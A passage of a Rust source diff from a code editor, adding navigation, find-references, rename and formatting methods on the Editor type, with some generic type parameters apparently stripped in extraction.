Window, + cx: &mut Context, + ) { + self.go_to_singleton_buffer_range(point..point, window, cx); + } + + pub fn go_to_singleton_buffer_range( + &mut self, + range: Range, + window: &mut Window, + cx: &mut Context, + ) { + let multibuffer = self.buffer().read(cx); + let Some(buffer) = multibuffer.as_singleton() else { + return; + }; + let Some(start) = multibuffer.buffer_point_to_anchor(&buffer, range.start, cx) else { + return; + }; + let Some(end) = multibuffer.buffer_point_to_anchor(&buffer, range.end, cx) else { + return; + }; + self.change_selections(Some(Autoscroll::center()), window, cx, |s| { + s.select_anchor_ranges([start..end]) + }); + } + + pub fn go_to_diagnostic( + &mut self, + _: &GoToDiagnostic, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.go_to_diagnostic_impl(Direction::Next, window, cx) + } + + pub fn go_to_prev_diagnostic( + &mut self, + _: &GoToPreviousDiagnostic, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.go_to_diagnostic_impl(Direction::Prev, window, cx) + } + + pub fn go_to_diagnostic_impl( + &mut self, + direction: Direction, + window: &mut Window, + cx: &mut Context, + ) { + let buffer = self.buffer.read(cx).snapshot(cx); + let selection = self.selections.newest::(cx); + + let mut active_group_id = None; + if let ActiveDiagnostic::Group(active_group) = &self.active_diagnostics { + if active_group.active_range.start.to_offset(&buffer) == selection.start { + active_group_id = Some(active_group.group_id); + } + } + + fn filtered( + snapshot: EditorSnapshot, + diagnostics: impl Iterator>, + ) -> impl Iterator> { + diagnostics + .filter(|entry| entry.range.start != entry.range.end) + .filter(|entry| !entry.diagnostic.is_unnecessary) + .filter(move |entry| !snapshot.intersects_fold(entry.range.start)) + } + + let snapshot = self.snapshot(window, cx); + let before = filtered( + 
snapshot.clone(), + buffer + .diagnostics_in_range(0..selection.start) + .filter(|entry| entry.range.start <= selection.start), + ); + let after = filtered( + snapshot, + buffer + .diagnostics_in_range(selection.start..buffer.len()) + .filter(|entry| entry.range.start >= selection.start), + ); + + let mut found: Option> = None; + if direction == Direction::Prev { + 'outer: for prev_diagnostics in [before.collect::>(), after.collect::>()] + { + for diagnostic in prev_diagnostics.into_iter().rev() { + if diagnostic.range.start != selection.start + || active_group_id + .is_some_and(|active| diagnostic.diagnostic.group_id < active) + { + found = Some(diagnostic); + break 'outer; + } + } + } + } else { + for diagnostic in after.chain(before) { + if diagnostic.range.start != selection.start + || active_group_id.is_some_and(|active| diagnostic.diagnostic.group_id > active) + { + found = Some(diagnostic); + break; + } + } + } + let Some(next_diagnostic) = found else { + return; + }; + + let Some(buffer_id) = buffer.anchor_after(next_diagnostic.range.start).buffer_id else { + return; + }; + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select_ranges(vec![ + next_diagnostic.range.start..next_diagnostic.range.start, + ]) + }); + self.activate_diagnostics(buffer_id, next_diagnostic, window, cx); + self.refresh_inline_completion(false, true, window, cx); + } + + fn go_to_next_hunk(&mut self, _: &GoToHunk, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + let snapshot = self.snapshot(window, cx); + let selection = self.selections.newest::(cx); + self.go_to_hunk_before_or_after_position( + &snapshot, + selection.head(), + Direction::Next, + window, + cx, + ); + } + + pub fn go_to_hunk_before_or_after_position( + &mut self, + snapshot: &EditorSnapshot, + position: Point, + direction: Direction, + window: &mut Window, + cx: &mut Context, + ) { + let row = if direction == Direction::Next { + 
self.hunk_after_position(snapshot, position) + .map(|hunk| hunk.row_range.start) + } else { + self.hunk_before_position(snapshot, position) + }; + + if let Some(row) = row { + let destination = Point::new(row.0, 0); + let autoscroll = Autoscroll::center(); + + self.unfold_ranges(&[destination..destination], false, false, cx); + self.change_selections(Some(autoscroll), window, cx, |s| { + s.select_ranges([destination..destination]); + }); + } + } + + fn hunk_after_position( + &mut self, + snapshot: &EditorSnapshot, + position: Point, + ) -> Option { + snapshot + .buffer_snapshot + .diff_hunks_in_range(position..snapshot.buffer_snapshot.max_point()) + .find(|hunk| hunk.row_range.start.0 > position.row) + .or_else(|| { + snapshot + .buffer_snapshot + .diff_hunks_in_range(Point::zero()..position) + .find(|hunk| hunk.row_range.end.0 < position.row) + }) + } + + fn go_to_prev_hunk( + &mut self, + _: &GoToPreviousHunk, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + let snapshot = self.snapshot(window, cx); + let selection = self.selections.newest::(cx); + self.go_to_hunk_before_or_after_position( + &snapshot, + selection.head(), + Direction::Prev, + window, + cx, + ); + } + + fn hunk_before_position( + &mut self, + snapshot: &EditorSnapshot, + position: Point, + ) -> Option { + snapshot + .buffer_snapshot + .diff_hunk_before(position) + .or_else(|| snapshot.buffer_snapshot.diff_hunk_before(Point::MAX)) + } + + fn go_to_next_change( + &mut self, + _: &GoToNextChange, + window: &mut Window, + cx: &mut Context, + ) { + if let Some(selections) = self + .change_list + .next_change(1, Direction::Next) + .map(|s| s.to_vec()) + { + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + let map = s.display_map(); + s.select_display_ranges(selections.iter().map(|a| { + let point = a.to_display_point(&map); + point..point + })) + }) + } + } + + fn go_to_previous_change( + &mut self, + _: 
&GoToPreviousChange, + window: &mut Window, + cx: &mut Context, + ) { + if let Some(selections) = self + .change_list + .next_change(1, Direction::Prev) + .map(|s| s.to_vec()) + { + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + let map = s.display_map(); + s.select_display_ranges(selections.iter().map(|a| { + let point = a.to_display_point(&map); + point..point + })) + }) + } + } + + fn go_to_line( + &mut self, + position: Anchor, + highlight_color: Option, + window: &mut Window, + cx: &mut Context, + ) { + let snapshot = self.snapshot(window, cx).display_snapshot; + let position = position.to_point(&snapshot.buffer_snapshot); + let start = snapshot + .buffer_snapshot + .clip_point(Point::new(position.row, 0), Bias::Left); + let end = start + Point::new(1, 0); + let start = snapshot.buffer_snapshot.anchor_before(start); + let end = snapshot.buffer_snapshot.anchor_before(end); + + self.highlight_rows::( + start..end, + highlight_color + .unwrap_or_else(|| cx.theme().colors().editor_highlighted_line_background), + Default::default(), + cx, + ); + self.request_autoscroll(Autoscroll::center().for_anchor(start), cx); + } + + pub fn go_to_definition( + &mut self, + _: &GoToDefinition, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + let definition = + self.go_to_definition_of_kind(GotoDefinitionKind::Symbol, false, window, cx); + let fallback_strategy = EditorSettings::get_global(cx).go_to_definition_fallback; + cx.spawn_in(window, async move |editor, cx| { + if definition.await? == Navigated::Yes { + return Ok(Navigated::Yes); + } + match fallback_strategy { + GoToDefinitionFallback::None => Ok(Navigated::No), + GoToDefinitionFallback::FindAllReferences => { + match editor.update_in(cx, |editor, window, cx| { + editor.find_all_references(&FindAllReferences, window, cx) + })? 
{ + Some(references) => references.await, + None => Ok(Navigated::No), + } + } + } + }) + } + + pub fn go_to_declaration( + &mut self, + _: &GoToDeclaration, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + self.go_to_definition_of_kind(GotoDefinitionKind::Declaration, false, window, cx) + } + + pub fn go_to_declaration_split( + &mut self, + _: &GoToDeclaration, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + self.go_to_definition_of_kind(GotoDefinitionKind::Declaration, true, window, cx) + } + + pub fn go_to_implementation( + &mut self, + _: &GoToImplementation, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + self.go_to_definition_of_kind(GotoDefinitionKind::Implementation, false, window, cx) + } + + pub fn go_to_implementation_split( + &mut self, + _: &GoToImplementationSplit, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + self.go_to_definition_of_kind(GotoDefinitionKind::Implementation, true, window, cx) + } + + pub fn go_to_type_definition( + &mut self, + _: &GoToTypeDefinition, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + self.go_to_definition_of_kind(GotoDefinitionKind::Type, false, window, cx) + } + + pub fn go_to_definition_split( + &mut self, + _: &GoToDefinitionSplit, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + self.go_to_definition_of_kind(GotoDefinitionKind::Symbol, true, window, cx) + } + + pub fn go_to_type_definition_split( + &mut self, + _: &GoToTypeDefinitionSplit, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + self.go_to_definition_of_kind(GotoDefinitionKind::Type, true, window, cx) + } + + fn go_to_definition_of_kind( + &mut self, + kind: GotoDefinitionKind, + split: bool, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + let Some(provider) = self.semantics_provider.clone() else { + return Task::ready(Ok(Navigated::No)); + }; + let head = self.selections.newest::(cx).head(); + let buffer = self.buffer.read(cx); + let (buffer, head) = if let 
Some(text_anchor) = buffer.text_anchor_for_position(head, cx) { + text_anchor + } else { + return Task::ready(Ok(Navigated::No)); + }; + + let Some(definitions) = provider.definitions(&buffer, head, kind, cx) else { + return Task::ready(Ok(Navigated::No)); + }; + + cx.spawn_in(window, async move |editor, cx| { + let definitions = definitions.await?; + let navigated = editor + .update_in(cx, |editor, window, cx| { + editor.navigate_to_hover_links( + Some(kind), + definitions + .into_iter() + .filter(|location| { + hover_links::exclude_link_to_position(&buffer, &head, location, cx) + }) + .map(HoverLink::Text) + .collect::>(), + split, + window, + cx, + ) + })? + .await?; + anyhow::Ok(navigated) + }) + } + + pub fn open_url(&mut self, _: &OpenUrl, window: &mut Window, cx: &mut Context) { + let selection = self.selections.newest_anchor(); + let head = selection.head(); + let tail = selection.tail(); + + let Some((buffer, start_position)) = + self.buffer.read(cx).text_anchor_for_position(head, cx) + else { + return; + }; + + let end_position = if head != tail { + let Some((_, pos)) = self.buffer.read(cx).text_anchor_for_position(tail, cx) else { + return; + }; + Some(pos) + } else { + None + }; + + let url_finder = cx.spawn_in(window, async move |editor, cx| { + let url = if let Some(end_pos) = end_position { + find_url_from_range(&buffer, start_position..end_pos, cx.clone()) + } else { + find_url(&buffer, start_position, cx.clone()).map(|(_, url)| url) + }; + + if let Some(url) = url { + editor.update(cx, |_, cx| { + cx.open_url(&url); + }) + } else { + Ok(()) + } + }); + + url_finder.detach(); + } + + pub fn open_selected_filename( + &mut self, + _: &OpenSelectedFilename, + window: &mut Window, + cx: &mut Context, + ) { + let Some(workspace) = self.workspace() else { + return; + }; + + let position = self.selections.newest_anchor().head(); + + let Some((buffer, buffer_position)) = + self.buffer.read(cx).text_anchor_for_position(position, cx) + else { + return; + }; + 
+ let project = self.project.clone(); + + cx.spawn_in(window, async move |_, cx| { + let result = find_file(&buffer, project, buffer_position, cx).await; + + if let Some((_, path)) = result { + workspace + .update_in(cx, |workspace, window, cx| { + workspace.open_resolved_path(path, window, cx) + })? + .await?; + } + anyhow::Ok(()) + }) + .detach(); + } + + pub(crate) fn navigate_to_hover_links( + &mut self, + kind: Option, + mut definitions: Vec, + split: bool, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + // If there is one definition, just open it directly + if definitions.len() == 1 { + let definition = definitions.pop().unwrap(); + + enum TargetTaskResult { + Location(Option), + AlreadyNavigated, + } + + let target_task = match definition { + HoverLink::Text(link) => { + Task::ready(anyhow::Ok(TargetTaskResult::Location(Some(link.target)))) + } + HoverLink::InlayHint(lsp_location, server_id) => { + let computation = + self.compute_target_location(lsp_location, server_id, window, cx); + cx.background_spawn(async move { + let location = computation.await?; + Ok(TargetTaskResult::Location(location)) + }) + } + HoverLink::Url(url) => { + cx.open_url(&url); + Task::ready(Ok(TargetTaskResult::AlreadyNavigated)) + } + HoverLink::File(path) => { + if let Some(workspace) = self.workspace() { + cx.spawn_in(window, async move |_, cx| { + workspace + .update_in(cx, |workspace, window, cx| { + workspace.open_resolved_path(path, window, cx) + })? + .await + .map(|_| TargetTaskResult::AlreadyNavigated) + }) + } else { + Task::ready(Ok(TargetTaskResult::Location(None))) + } + } + }; + cx.spawn_in(window, async move |editor, cx| { + let target = match target_task.await.context("target resolution task")? 
{ + TargetTaskResult::AlreadyNavigated => return Ok(Navigated::Yes), + TargetTaskResult::Location(None) => return Ok(Navigated::No), + TargetTaskResult::Location(Some(target)) => target, + }; + + editor.update_in(cx, |editor, window, cx| { + let Some(workspace) = editor.workspace() else { + return Navigated::No; + }; + let pane = workspace.read(cx).active_pane().clone(); + + let range = target.range.to_point(target.buffer.read(cx)); + let range = editor.range_for_match(&range); + let range = collapse_multiline_range(range); + + if !split + && Some(&target.buffer) == editor.buffer.read(cx).as_singleton().as_ref() + { + editor.go_to_singleton_buffer_range(range.clone(), window, cx); + } else { + window.defer(cx, move |window, cx| { + let target_editor: Entity = + workspace.update(cx, |workspace, cx| { + let pane = if split { + workspace.adjacent_pane(window, cx) + } else { + workspace.active_pane().clone() + }; + + workspace.open_project_item( + pane, + target.buffer.clone(), + true, + true, + window, + cx, + ) + }); + target_editor.update(cx, |target_editor, cx| { + // When selecting a definition in a different buffer, disable the nav history + // to avoid creating a history entry at the previous cursor location. 
+ pane.update(cx, |pane, _| pane.disable_history()); + target_editor.go_to_singleton_buffer_range(range, window, cx); + pane.update(cx, |pane, _| pane.enable_history()); + }); + }); + } + Navigated::Yes + }) + }) + } else if !definitions.is_empty() { + cx.spawn_in(window, async move |editor, cx| { + let (title, location_tasks, workspace) = editor + .update_in(cx, |editor, window, cx| { + let tab_kind = match kind { + Some(GotoDefinitionKind::Implementation) => "Implementations", + _ => "Definitions", + }; + let title = definitions + .iter() + .find_map(|definition| match definition { + HoverLink::Text(link) => link.origin.as_ref().map(|origin| { + let buffer = origin.buffer.read(cx); + format!( + "{} for {}", + tab_kind, + buffer + .text_for_range(origin.range.clone()) + .collect::() + ) + }), + HoverLink::InlayHint(_, _) => None, + HoverLink::Url(_) => None, + HoverLink::File(_) => None, + }) + .unwrap_or(tab_kind.to_string()); + let location_tasks = definitions + .into_iter() + .map(|definition| match definition { + HoverLink::Text(link) => Task::ready(Ok(Some(link.target))), + HoverLink::InlayHint(lsp_location, server_id) => editor + .compute_target_location(lsp_location, server_id, window, cx), + HoverLink::Url(_) => Task::ready(Ok(None)), + HoverLink::File(_) => Task::ready(Ok(None)), + }) + .collect::>(); + (title, location_tasks, editor.workspace().clone()) + }) + .context("location tasks preparation")?; + + let locations = future::join_all(location_tasks) + .await + .into_iter() + .filter_map(|location| location.transpose()) + .collect::>() + .context("location tasks")?; + + let Some(workspace) = workspace else { + return Ok(Navigated::No); + }; + let opened = workspace + .update_in(cx, |workspace, window, cx| { + Self::open_locations_in_multibuffer( + workspace, + locations, + title, + split, + MultibufferSelectionMode::First, + window, + cx, + ) + }) + .ok(); + + anyhow::Ok(Navigated::from_bool(opened.is_some())) + }) + } else { + 
Task::ready(Ok(Navigated::No)) + } + } + + fn compute_target_location( + &self, + lsp_location: lsp::Location, + server_id: LanguageServerId, + window: &mut Window, + cx: &mut Context, + ) -> Task>> { + let Some(project) = self.project.clone() else { + return Task::ready(Ok(None)); + }; + + cx.spawn_in(window, async move |editor, cx| { + let location_task = editor.update(cx, |_, cx| { + project.update(cx, |project, cx| { + let language_server_name = project + .language_server_statuses(cx) + .find(|(id, _)| server_id == *id) + .map(|(_, status)| LanguageServerName::from(status.name.as_str())); + language_server_name.map(|language_server_name| { + project.open_local_buffer_via_lsp( + lsp_location.uri.clone(), + server_id, + language_server_name, + cx, + ) + }) + }) + })?; + let location = match location_task { + Some(task) => Some({ + let target_buffer_handle = task.await.context("open local buffer")?; + let range = target_buffer_handle.update(cx, |target_buffer, _| { + let target_start = target_buffer + .clip_point_utf16(point_from_lsp(lsp_location.range.start), Bias::Left); + let target_end = target_buffer + .clip_point_utf16(point_from_lsp(lsp_location.range.end), Bias::Left); + target_buffer.anchor_after(target_start) + ..target_buffer.anchor_before(target_end) + })?; + Location { + buffer: target_buffer_handle, + range, + } + }), + None => None, + }; + Ok(location) + }) + } + + pub fn find_all_references( + &mut self, + _: &FindAllReferences, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + let selection = self.selections.newest::(cx); + let multi_buffer = self.buffer.read(cx); + let head = selection.head(); + + let multi_buffer_snapshot = multi_buffer.snapshot(cx); + let head_anchor = multi_buffer_snapshot.anchor_at( + head, + if head < selection.tail() { + Bias::Right + } else { + Bias::Left + }, + ); + + match self + .find_all_references_task_sources + .binary_search_by(|anchor| anchor.cmp(&head_anchor, &multi_buffer_snapshot)) + { + Ok(_) => { 
+ log::info!( + "Ignoring repeated FindAllReferences invocation with the position of already running task" + ); + return None; + } + Err(i) => { + self.find_all_references_task_sources.insert(i, head_anchor); + } + } + + let (buffer, head) = multi_buffer.text_anchor_for_position(head, cx)?; + let workspace = self.workspace()?; + let project = workspace.read(cx).project().clone(); + let references = project.update(cx, |project, cx| project.references(&buffer, head, cx)); + Some(cx.spawn_in(window, async move |editor, cx| { + let _cleanup = cx.on_drop(&editor, move |editor, _| { + if let Ok(i) = editor + .find_all_references_task_sources + .binary_search_by(|anchor| anchor.cmp(&head_anchor, &multi_buffer_snapshot)) + { + editor.find_all_references_task_sources.remove(i); + } + }); + + let locations = references.await?; + if locations.is_empty() { + return anyhow::Ok(Navigated::No); + } + + workspace.update_in(cx, |workspace, window, cx| { + let title = locations + .first() + .as_ref() + .map(|location| { + let buffer = location.buffer.read(cx); + format!( + "References to `{}`", + buffer + .text_for_range(location.range.clone()) + .collect::() + ) + }) + .unwrap(); + Self::open_locations_in_multibuffer( + workspace, + locations, + title, + false, + MultibufferSelectionMode::First, + window, + cx, + ); + Navigated::Yes + }) + })) + } + + /// Opens a multibuffer with the given project locations in it + pub fn open_locations_in_multibuffer( + workspace: &mut Workspace, + mut locations: Vec, + title: String, + split: bool, + multibuffer_selection_mode: MultibufferSelectionMode, + window: &mut Window, + cx: &mut Context, + ) { + // If there are multiple definitions, open them in a multibuffer + locations.sort_by_key(|location| location.buffer.read(cx).remote_id()); + let mut locations = locations.into_iter().peekable(); + let mut ranges: Vec> = Vec::new(); + let capability = workspace.project().read(cx).capability(); + + let excerpt_buffer = cx.new(|cx| { + let mut 
multibuffer = MultiBuffer::new(capability); + while let Some(location) = locations.next() { + let buffer = location.buffer.read(cx); + let mut ranges_for_buffer = Vec::new(); + let range = location.range.to_point(buffer); + ranges_for_buffer.push(range.clone()); + + while let Some(next_location) = locations.peek() { + if next_location.buffer == location.buffer { + ranges_for_buffer.push(next_location.range.to_point(buffer)); + locations.next(); + } else { + break; + } + } + + ranges_for_buffer.sort_by_key(|range| (range.start, Reverse(range.end))); + let (new_ranges, _) = multibuffer.set_excerpts_for_path( + PathKey::for_buffer(&location.buffer, cx), + location.buffer.clone(), + ranges_for_buffer, + DEFAULT_MULTIBUFFER_CONTEXT, + cx, + ); + ranges.extend(new_ranges) + } + + multibuffer.with_title(title) + }); + + let editor = cx.new(|cx| { + Editor::for_multibuffer( + excerpt_buffer, + Some(workspace.project().clone()), + window, + cx, + ) + }); + editor.update(cx, |editor, cx| { + match multibuffer_selection_mode { + MultibufferSelectionMode::First => { + if let Some(first_range) = ranges.first() { + editor.change_selections(None, window, cx, |selections| { + selections.clear_disjoint(); + selections.select_anchor_ranges(std::iter::once(first_range.clone())); + }); + } + editor.highlight_background::( + &ranges, + |theme| theme.editor_highlighted_line_background, + cx, + ); + } + MultibufferSelectionMode::All => { + editor.change_selections(None, window, cx, |selections| { + selections.clear_disjoint(); + selections.select_anchor_ranges(ranges); + }); + } + } + editor.register_buffers_with_language_servers(cx); + }); + + let item = Box::new(editor); + let item_id = item.item_id(); + + if split { + workspace.split_item(SplitDirection::Right, item.clone(), window, cx); + } else { + if PreviewTabsSettings::get_global(cx).enable_preview_from_code_navigation { + let (preview_item_id, preview_item_idx) = + workspace.active_pane().update(cx, |pane, _| { + 
(pane.preview_item_id(), pane.preview_item_idx()) + }); + + workspace.add_item_to_active_pane(item.clone(), preview_item_idx, true, window, cx); + + if let Some(preview_item_id) = preview_item_id { + workspace.active_pane().update(cx, |pane, cx| { + pane.remove_item(preview_item_id, false, false, window, cx); + }); + } + } else { + workspace.add_item_to_active_pane(item.clone(), None, true, window, cx); + } + } + workspace.active_pane().update(cx, |pane, cx| { + pane.set_preview_item_id(Some(item_id), cx); + }); + } + + pub fn rename( + &mut self, + _: &Rename, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + use language::ToOffset as _; + + let provider = self.semantics_provider.clone()?; + let selection = self.selections.newest_anchor().clone(); + let (cursor_buffer, cursor_buffer_position) = self + .buffer + .read(cx) + .text_anchor_for_position(selection.head(), cx)?; + let (tail_buffer, cursor_buffer_position_end) = self + .buffer + .read(cx) + .text_anchor_for_position(selection.tail(), cx)?; + if tail_buffer != cursor_buffer { + return None; + } + + let snapshot = cursor_buffer.read(cx).snapshot(); + let cursor_buffer_offset = cursor_buffer_position.to_offset(&snapshot); + let cursor_buffer_offset_end = cursor_buffer_position_end.to_offset(&snapshot); + let prepare_rename = provider + .range_for_rename(&cursor_buffer, cursor_buffer_position, cx) + .unwrap_or_else(|| Task::ready(Ok(None))); + drop(snapshot); + + Some(cx.spawn_in(window, async move |this, cx| { + let rename_range = if let Some(range) = prepare_rename.await? 
{ + Some(range) + } else { + this.update(cx, |this, cx| { + let buffer = this.buffer.read(cx).snapshot(cx); + let mut buffer_highlights = this + .document_highlights_for_position(selection.head(), &buffer) + .filter(|highlight| { + highlight.start.excerpt_id == selection.head().excerpt_id + && highlight.end.excerpt_id == selection.head().excerpt_id + }); + buffer_highlights + .next() + .map(|highlight| highlight.start.text_anchor..highlight.end.text_anchor) + })? + }; + if let Some(rename_range) = rename_range { + this.update_in(cx, |this, window, cx| { + let snapshot = cursor_buffer.read(cx).snapshot(); + let rename_buffer_range = rename_range.to_offset(&snapshot); + let cursor_offset_in_rename_range = + cursor_buffer_offset.saturating_sub(rename_buffer_range.start); + let cursor_offset_in_rename_range_end = + cursor_buffer_offset_end.saturating_sub(rename_buffer_range.start); + + this.take_rename(false, window, cx); + let buffer = this.buffer.read(cx).read(cx); + let cursor_offset = selection.head().to_offset(&buffer); + let rename_start = cursor_offset.saturating_sub(cursor_offset_in_rename_range); + let rename_end = rename_start + rename_buffer_range.len(); + let range = buffer.anchor_before(rename_start)..buffer.anchor_after(rename_end); + let mut old_highlight_id = None; + let old_name: Arc = buffer + .chunks(rename_start..rename_end, true) + .map(|chunk| { + if old_highlight_id.is_none() { + old_highlight_id = chunk.syntax_highlight_id; + } + chunk.text + }) + .collect::() + .into(); + + drop(buffer); + + // Position the selection in the rename editor so that it matches the current selection. 
+ this.show_local_selections = false; + let rename_editor = cx.new(|cx| { + let mut editor = Editor::single_line(window, cx); + editor.buffer.update(cx, |buffer, cx| { + buffer.edit([(0..0, old_name.clone())], None, cx) + }); + let rename_selection_range = match cursor_offset_in_rename_range + .cmp(&cursor_offset_in_rename_range_end) + { + Ordering::Equal => { + editor.select_all(&SelectAll, window, cx); + return editor; + } + Ordering::Less => { + cursor_offset_in_rename_range..cursor_offset_in_rename_range_end + } + Ordering::Greater => { + cursor_offset_in_rename_range_end..cursor_offset_in_rename_range + } + }; + if rename_selection_range.end > old_name.len() { + editor.select_all(&SelectAll, window, cx); + } else { + editor.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select_ranges([rename_selection_range]); + }); + } + editor + }); + cx.subscribe(&rename_editor, |_, _, e: &EditorEvent, cx| { + if e == &EditorEvent::Focused { + cx.emit(EditorEvent::FocusedIn) + } + }) + .detach(); + + let write_highlights = + this.clear_background_highlights::(cx); + let read_highlights = + this.clear_background_highlights::(cx); + let ranges = write_highlights + .iter() + .flat_map(|(_, ranges)| ranges.iter()) + .chain(read_highlights.iter().flat_map(|(_, ranges)| ranges.iter())) + .cloned() + .collect(); + + this.highlight_text::( + ranges, + HighlightStyle { + fade_out: Some(0.6), + ..Default::default() + }, + cx, + ); + let rename_focus_handle = rename_editor.focus_handle(cx); + window.focus(&rename_focus_handle); + let block_id = this.insert_blocks( + [BlockProperties { + style: BlockStyle::Flex, + placement: BlockPlacement::Below(range.start), + height: Some(1), + render: Arc::new({ + let rename_editor = rename_editor.clone(); + move |cx: &mut BlockContext| { + let mut text_style = cx.editor_style.text.clone(); + if let Some(highlight_style) = old_highlight_id + .and_then(|h| h.style(&cx.editor_style.syntax)) + { + text_style = 
text_style.highlight(highlight_style); + } + div() + .block_mouse_down() + .pl(cx.anchor_x) + .child(EditorElement::new( + &rename_editor, + EditorStyle { + background: cx.theme().system().transparent, + local_player: cx.editor_style.local_player, + text: text_style, + scrollbar_width: cx.editor_style.scrollbar_width, + syntax: cx.editor_style.syntax.clone(), + status: cx.editor_style.status.clone(), + inlay_hints_style: HighlightStyle { + font_weight: Some(FontWeight::BOLD), + ..make_inlay_hints_style(cx.app) + }, + inline_completion_styles: make_suggestion_styles( + cx.app, + ), + ..EditorStyle::default() + }, + )) + .into_any_element() + } + }), + priority: 0, + }], + Some(Autoscroll::fit()), + cx, + )[0]; + this.pending_rename = Some(RenameState { + range, + old_name, + editor: rename_editor, + block_id, + }); + })?; + } + + Ok(()) + })) + } + + pub fn confirm_rename( + &mut self, + _: &ConfirmRename, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + let rename = self.take_rename(false, window, cx)?; + let workspace = self.workspace()?.downgrade(); + let (buffer, start) = self + .buffer + .read(cx) + .text_anchor_for_position(rename.range.start, cx)?; + let (end_buffer, _) = self + .buffer + .read(cx) + .text_anchor_for_position(rename.range.end, cx)?; + if buffer != end_buffer { + return None; + } + + let old_name = rename.old_name; + let new_name = rename.editor.read(cx).text(cx); + + let rename = self.semantics_provider.as_ref()?.perform_rename( + &buffer, + start, + new_name.clone(), + cx, + )?; + + Some(cx.spawn_in(window, async move |editor, cx| { + let project_transaction = rename.await?; + Self::open_project_transaction( + &editor, + workspace, + project_transaction, + format!("Rename: {} → {}", old_name, new_name), + cx, + ) + .await?; + + editor.update(cx, |editor, cx| { + editor.refresh_document_highlights(cx); + })?; + Ok(()) + })) + } + + fn take_rename( + &mut self, + moving_cursor: bool, + window: &mut Window, + cx: &mut Context, + ) 
-> Option { + let rename = self.pending_rename.take()?; + if rename.editor.focus_handle(cx).is_focused(window) { + window.focus(&self.focus_handle); + } + + self.remove_blocks( + [rename.block_id].into_iter().collect(), + Some(Autoscroll::fit()), + cx, + ); + self.clear_highlights::(cx); + self.show_local_selections = true; + + if moving_cursor { + let cursor_in_rename_editor = rename.editor.update(cx, |editor, cx| { + editor.selections.newest::(cx).head() + }); + + // Update the selection to match the position of the selection inside + // the rename editor. + let snapshot = self.buffer.read(cx).read(cx); + let rename_range = rename.range.to_offset(&snapshot); + let cursor_in_editor = snapshot + .clip_offset(rename_range.start + cursor_in_rename_editor, Bias::Left) + .min(rename_range.end); + drop(snapshot); + + self.change_selections(None, window, cx, |s| { + s.select_ranges(vec![cursor_in_editor..cursor_in_editor]) + }); + } else { + self.refresh_document_highlights(cx); + } + + Some(rename) + } + + pub fn pending_rename(&self) -> Option<&RenameState> { + self.pending_rename.as_ref() + } + + fn format( + &mut self, + _: &Format, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + let project = match &self.project { + Some(project) => project.clone(), + None => return None, + }; + + Some(self.perform_format( + project, + FormatTrigger::Manual, + FormatTarget::Buffers, + window, + cx, + )) + } + + fn format_selections( + &mut self, + _: &FormatSelections, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + let project = match &self.project { + Some(project) => project.clone(), + None => return None, + }; + + let ranges = self + .selections + .all_adjusted(cx) + .into_iter() + .map(|selection| selection.range()) + .collect_vec(); + + Some(self.perform_format( + project, + FormatTrigger::Manual, + 
FormatTarget::Ranges(ranges), + window, + cx, + )) + } + + fn perform_format( + &mut self, + project: Entity, + trigger: FormatTrigger, + target: FormatTarget, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + let buffer = self.buffer.clone(); + let (buffers, target) = match target { + FormatTarget::Buffers => { + let mut buffers = buffer.read(cx).all_buffers(); + if trigger == FormatTrigger::Save { + buffers.retain(|buffer| buffer.read(cx).is_dirty()); + } + (buffers, LspFormatTarget::Buffers) + } + FormatTarget::Ranges(selection_ranges) => { + let multi_buffer = buffer.read(cx); + let snapshot = multi_buffer.read(cx); + let mut buffers = HashSet::default(); + let mut buffer_id_to_ranges: BTreeMap>> = + BTreeMap::new(); + for selection_range in selection_ranges { + for (buffer, buffer_range, _) in + snapshot.range_to_buffer_ranges(selection_range) + { + let buffer_id = buffer.remote_id(); + let start = buffer.anchor_before(buffer_range.start); + let end = buffer.anchor_after(buffer_range.end); + buffers.insert(multi_buffer.buffer(buffer_id).unwrap()); + buffer_id_to_ranges + .entry(buffer_id) + .and_modify(|buffer_ranges| buffer_ranges.push(start..end)) + .or_insert_with(|| vec![start..end]); + } + } + (buffers, LspFormatTarget::Ranges(buffer_id_to_ranges)) + } + }; + + let transaction_id_prev = buffer.read_with(cx, |b, cx| b.last_transaction_id(cx)); + let selections_prev = transaction_id_prev + .and_then(|transaction_id_prev| { + // default to selections as they were after the last edit, if we have them, + // instead of how they are now. + // This will make it so that editing, moving somewhere else, formatting, then undoing the format + // will take you back to where you made the last edit, instead of staying where you scrolled + self.selection_history + .transaction(transaction_id_prev) + .map(|t| t.0.clone()) + }) + .unwrap_or_else(|| { + log::info!("Failed to determine selections from before format. 
